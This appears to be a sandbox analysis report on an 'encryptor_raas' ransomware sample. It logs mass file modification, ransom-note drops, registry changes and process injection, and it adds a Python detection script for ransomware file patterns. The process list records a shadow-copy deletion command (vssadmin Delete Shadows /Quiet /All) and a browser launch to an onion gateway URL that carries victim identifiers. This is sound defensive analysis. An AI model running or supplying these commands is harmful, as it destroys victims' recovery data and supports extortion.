File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..adisc-style-babyboy_31bf3856ad364e35_6.1.7600.16385_none_f13596916b261f67\navSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_job_details.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8a445b750021d88a\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_objects.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_Windows_PowerShell_2.0.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..terprisee.resources_31bf3856ad364e35_6.1.7601.17514_it-it_66b0580ce2717717\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\item_hover_docked.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\5.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_methods.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ringtonesamples_31bf3856ad364e35_6.1.7600.16385_none_135e536ebbe59c28\Ringtone 06.wma C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b4a6b77ab9aa530d\about_History.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\ZA-wp3.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\45.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_Return.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_History.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_WS-Management_Cmdlets.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d34b7c772c3fe85c\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\12.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_it-it_d2c0ff1e722cb495\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Exclamation.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_escape_characters.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmcdp.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmmct.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\ql40xx.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_Automatic_Variables.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_it-it_1e4d6c8ff7baeac6\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v3.5\SQL\it\SqlPersistenceProviderSchema.sql C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..homegroup.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ab00b852533a224a\OOBE_HELP_What_is_HomeGroup.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Windows Balloon.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_pipelines.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_properties.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ehome-epgtos.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b661d7abc4d159c8\epgtos.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
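The two file tables above show the pattern that makes this detonation ransomware rather than a stealer or a dropper: a single process opens files of every type (.PNF, .SQL, .jpg, .wav, .rtf, .jar) for modification under C:\Windows and C:\Program Files, and drops the same note filename, readme_liesmich_encryptor_raas.txt, into each directory it touches. The script below is an added example, not part of this report or of the sample; it parses rows in the "Description Indicator Process Target" layout used here, groups them per process and scores that combination. The sample rows are constructed (copied from the tables above, plus one benign iexplore.exe row), and the thresholds are set for that small sample.

```python
"""Ransomware heuristics over sandbox file-event rows (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

DESCRIPTIONS = ("File created", "File opened for modification")
DRIVE_RE = re.compile(r"[A-Za-z]:\\")   # start of a drive-rooted path
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Thresholds chosen for the constructed sample; raise them for real event volumes.
NOTE_MIN_DIRS = 3    # same filename created in at least this many directories
MOD_MIN_FILES = 5    # distinct files opened for modification by one process
EXT_MIN = 4          # distinct extensions among those files


@dataclass
class FileEvent:
    description: str
    path: str
    process: str
    target: str


@dataclass
class Finding:
    process: str
    notes: Dict[str, int]    # note filename -> number of directories it was created in
    modified_files: int
    extensions: int
    system_hits: int         # modified files under SYSTEM_ROOTS
    verdict: str             # "ransomware-like", "suspicious" or "none"


def parse_row(row: str) -> Optional[FileEvent]:
    """Parse one table row; returns None for the header or rows of another shape."""
    for desc in DESCRIPTIONS:
        if row.startswith(desc + " "):
            rest = row[len(desc) + 1:]
            break
    else:
        return None
    if " " not in rest:
        return None
    rest, target = rest.rsplit(" ", 1)
    # Indicator and process are both paths and either may contain spaces
    # ("Windows Hardware Fail.wav", "C:\Program Files\..."), so split on the
    # LAST drive-rooted path: that one is the process column.
    starts = [m.start() for m in DRIVE_RE.finditer(rest)]
    if len(starts) < 2:
        return None
    return FileEvent(desc, rest[:starts[-1]].rstrip(), rest[starts[-1]:], target)


def analyse(rows: List[str]) -> Dict[str, Finding]:
    per_proc = defaultdict(lambda: {"created": defaultdict(set), "modified": set()})
    for row in rows:
        ev = parse_row(row)
        if ev is None:
            continue
        directory, _, name = ev.path.lower().rpartition("\\")
        bucket = per_proc[ev.process]
        if ev.description == "File created":
            bucket["created"][name].add(directory)
        else:
            bucket["modified"].add(ev.path.lower())

    findings = {}
    for proc, bucket in per_proc.items():
        # A "note" is any filename created in many distinct directories.
        notes = {n: len(d) for n, d in bucket["created"].items() if len(d) >= NOTE_MIN_DIRS}
        modified = bucket["modified"]
        names = [p.rpartition("\\")[2] for p in modified]
        exts = {n.rpartition(".")[2] for n in names if "." in n}
        system_hits = sum(p.startswith(SYSTEM_ROOTS) for p in modified)
        signals = (bool(notes), len(modified) >= MOD_MIN_FILES, len(exts) >= EXT_MIN)
        verdict = "ransomware-like" if all(signals) else "suspicious" if any(signals) else "none"
        findings[proc] = Finding(proc, notes, len(modified), len(exts), system_hits, verdict)
    return findings


# Constructed sample: rows copied from the tables above plus one benign row.
ENCRYPTOR = r"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"
IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"
SAMPLE_ROWS = [
    "Description Indicator Process Target",
    rf"File opened for modification C:\Windows\inf\netbvbda.PNF {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UnInstallProfile.SQL {ENCRYPTOR} N/A",
    rf"File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\Users\readme_liesmich_encryptor_raas.txt {ENCRYPTOR} N/A",
    rf"File created C:\Windows\winsxs\amd64_microsoft-windows-tapicore_31bf3856ad364e35_6.1.7600.16385_none_402eca316047a0fe\readme_liesmich_encryptor_raas.txt {ENCRYPTOR} N/A",
    rf"File created C:\Program Files\Common Files\Microsoft Shared\ink\readme_liesmich_encryptor_raas.txt {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Windows\Web\Wallpaper\Scenes\img28.jpg {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Windows Hardware Fail.wav {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_c985fbedc9886bd1\license.rtf {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar {ENCRYPTOR} N/A",
    rf"File opened for modification C:\Users\Admin\AppData\Local\Temp\CabAA92.tmp {IEXPLORE} N/A",  # constructed, benign
]

if __name__ == "__main__":
    for proc, f in analyse(SAMPLE_ROWS).items():
        print(f"{f.verdict:16} notes={f.notes} modified={f.modified_files} "
              f"exts={f.extensions} system={f.system_hits}  {proc}")
```

The note heuristic keys on "same filename, many directories" rather than on the name readme_liesmich_encryptor_raas.txt itself, so it also fires on a rebuilt sample with a different note name; the extension count is what separates indiscriminate encryption from an installer or updater that rewrites many files of one or two types.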

Enumerates physical storage devices

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70427c9ce83cdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AD4DF3F1-A8DB-11EF-80CF-C28ADB222BBA} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438446561" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000fabede692f1078d982771425538199acac6cd5298d2fcd15234379589b90e401000000000e8000000002000020000000fe901a83de7b3cf7c49cb6b4d1287fa83463d40fc968f1a212ac5aa2ed78432520000000225c48793f07b1f10a8f1bebcd32468073c4a5cf5ba7f5e2daf7fa03af4f7886400000003ec76856395dbb58f7a96acf17b85e295c5009450e74bf0479b46867a5fa09a3ec4d1d086db7174f4f39354a00ef40471567998848570a328f99da4b05b1ac25 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe

"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://kqd2eml2kjib53oe.onion.link/vict?cust=9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581&guid=bf99bef1-312f-4726-8597-70228ef05e99

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /Quiet /All

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2
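Read together with the WriteProcessMemory table, this process list is the whole attack chain: PID 2316 (the encryptor) starts cmd.exe (2608), which runs vssadmin Delete Shadows /Quiet /All (2356) to remove restore points, and starts iexplore.exe (2668) with a URL on the kqd2eml2kjib53oe.onion.link Tor2web gateway whose query string carries the victim identifiers (cust=, guid=). The vssvc.exe entry and its SeBackupPrivilege/SeRestorePrivilege token adjustments are the Volume Shadow Copy service servicing that deletion, not an action of the sample, and the IEXPLORE.EXE child with SCODEF:2668 is the normal IE content process. The script below is an added example, not the sandbox's or the sample's code, that turns the chain into two detections over process-creation events: shadow-copy deletion through vssadmin, tolerant of argument order, letter case and cmd.exe /C indirection, and a browser started by a non-browser parent with a gateway URL, from which it extracts the victim identifiers and the ancestry back to the root. PIDs and command lines are those listed above; the explorer.exe root, the benign "vssadmin list shadows" event and the gateway suffix list beyond onion.link are constructed assumptions.

```python
"""Process-tree detections for vssadmin shadow deletion and a Tor2web beacon (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
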